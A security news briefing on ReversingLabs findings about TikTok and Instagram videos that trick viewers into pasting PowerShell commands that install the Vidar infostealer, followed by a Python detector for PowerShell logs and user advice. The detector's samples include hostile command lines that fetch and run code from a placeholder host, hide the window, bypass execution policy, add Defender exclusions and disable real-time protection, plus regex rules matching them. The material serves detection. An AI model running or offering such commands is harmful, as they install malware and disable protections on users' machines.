The next malware campaign aimed at you might arrive as a helpful-looking TikTok or Instagram Reels video. Researchers at ReversingLabs have uncovered two active campaigns that use short, professional-looking social media clips promising free Spotify Premium, free Windows activation, or free Microsoft Office, then walk viewers step by step into infecting their own Windows PCs with an infostealer.
It is the latest sign that criminals have learned to work social media algorithms as skillfully as marketers do, moving away from email phishing and toward tricking people into running malware themselves. National cybersecurity agencies and other researchers have reported similar activity, pointing to a growing trend.
How the scam works
One campaign is especially polished. Accounts with names like windows.tips or windows.insights adopt Windows-style branding and post tutorial videos that look like genuine tech-support content, tagged with Windows and Office keywords so they surface alongside real troubleshooting clips. The videos promise to unlock Spotify Premium, Office, or Windows at no cost, then guide viewers to open PowerShell, a legitimate Windows administration tool, and paste in commands. Those commands quietly download and run malware, the same self-inflicted pattern seen in so-called ClickFix scams.
The payload was identified as Vidar, an infostealer that targets saved browser passwords, autofill data, cookies, cryptocurrency wallets, two-factor authentication data, and even Tor browser data, then sends everything back to attacker-controlled servers. ReversingLabs notes that scripts in similar TikTok-based attacks often add exclusions to Windows Defender first, making it harder for security software to catch what follows.
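The paragraph above describes two behaviours a defender can hunt for once a victim has pasted the commands: a Windows Defender exclusion being added before anything else runs, and a download-and-execute chain in PowerShell. The following Python is an added example, not code from the original briefing or from ReversingLabs; it assumes PowerShell script block logging (Event ID 4104) is enabled so that script text is available, and it runs a small rule set over constructed sample script blocks (the hxxp:// hosts and paths are placeholders, not indicators from the campaign).

```python
import re
from dataclasses import dataclass

# Constructed sample script-block text in the shape PowerShell script block
# logging (Event ID 4104) records. None of these are captured from the
# campaign described in the briefing; hosts are defanged placeholders.
SAMPLE_SCRIPT_BLOCKS = [
    # 0: routine administration, should not be flagged
    r"Get-Service -Name Spooler | Restart-Service",
    # 1: exclusion added to Defender before the payload arrives
    r'Add-MpPreference -ExclusionPath "$env:APPDATA"',
    # 2: classic in-memory download cradle
    r"$u='hxxp://placeholder.example/x.ps1'; iex (New-Object Net.WebClient).DownloadString($u)",
    # 3: hidden window, policy bypass, download to disk, then execute
    r'powershell -w hidden -ep bypass -c "Invoke-WebRequest -Uri hxxp://placeholder.example/a.exe -OutFile $env:TEMP\a.exe; Start-Process $env:TEMP\a.exe"',
    # 4: real-time protection switched off
    r"Set-MpPreference -DisableRealtimeMonitoring $true",
    # 5: a download with no execution step, worth a look but lower priority
    r"Invoke-WebRequest -Uri https://www.example.com/status -OutFile $env:TEMP\status.html",
]

# Each rule is (name, compiled pattern). Patterns are case-insensitive because
# PowerShell cmdlets and parameters are.
RULES = [
    ("defender_exclusion",
     re.compile(r"\bAdd-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)),
    ("defender_disable",
     re.compile(r"\bSet-MpPreference\b.*-Disable\w+\s+\$?true", re.I)),
    ("download_cradle",
     re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|Start-BitsTransfer)", re.I)),
    ("inline_execution",
     re.compile(r"(\biex\b|Invoke-Expression|Start-Process)", re.I)),
    ("hidden_window",
     re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass",
     re.compile(r"-e(xecutionpolicy|p)?\s+bypass", re.I)),
]


@dataclass
class Finding:
    index: int        # position of the script block in the input list
    rules: tuple      # names of the rules that matched, in RULES order
    severity: str     # "high" or "medium"


def classify(script: str) -> list:
    """Return the names of every rule whose pattern matches the script text."""
    return [name for name, pattern in RULES if pattern.search(script)]


def severity(hits: list) -> str:
    """Rank a set of rule hits. Tampering with Defender, or a download paired
    with an execution step, is treated as high; a lone hit is medium."""
    if not hits:
        return "none"
    if "defender_exclusion" in hits or "defender_disable" in hits:
        return "high"
    if "download_cradle" in hits and "inline_execution" in hits:
        return "high"
    return "medium"


def scan(blocks: list) -> list:
    """Run every rule over every script block and collect the flagged ones."""
    findings = []
    for i, script in enumerate(blocks):
        hits = classify(script)
        sev = severity(hits)
        if sev != "none":
            findings.append(Finding(i, tuple(hits), sev))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{f.severity:6}] block {f.index}: {', '.join(f.rules)}")
```

The severity logic is deliberately simple: a Defender exclusion or a disabled protection setting is flagged on its own because legitimate administration rarely does that from an interactive session a user was coached into opening, while a download is only escalated when the same block also executes what it fetched. In a real deployment the rules would be applied to the ScriptBlockText field of 4104 events, and the benign hit on block 5 is the kind of result that needs an allowlist for known update tooling.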
What you should do
Only download software from official vendor websites, and be skeptical of any free, cracked, or unofficial version of paid software. Most importantly, never paste commands into PowerShell or a terminal just because a video or web page told you to, because that single step is what turns a curious viewer into a victim. Watch for pages that use countdowns or fake user counters to rush you, and verify a downloaded file's publisher and digital signature before running it. Mac users face the same playbook through fake installers that walk victims past Apple's Gatekeeper. You can read more in the report documenting the ReversingLabs findings.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.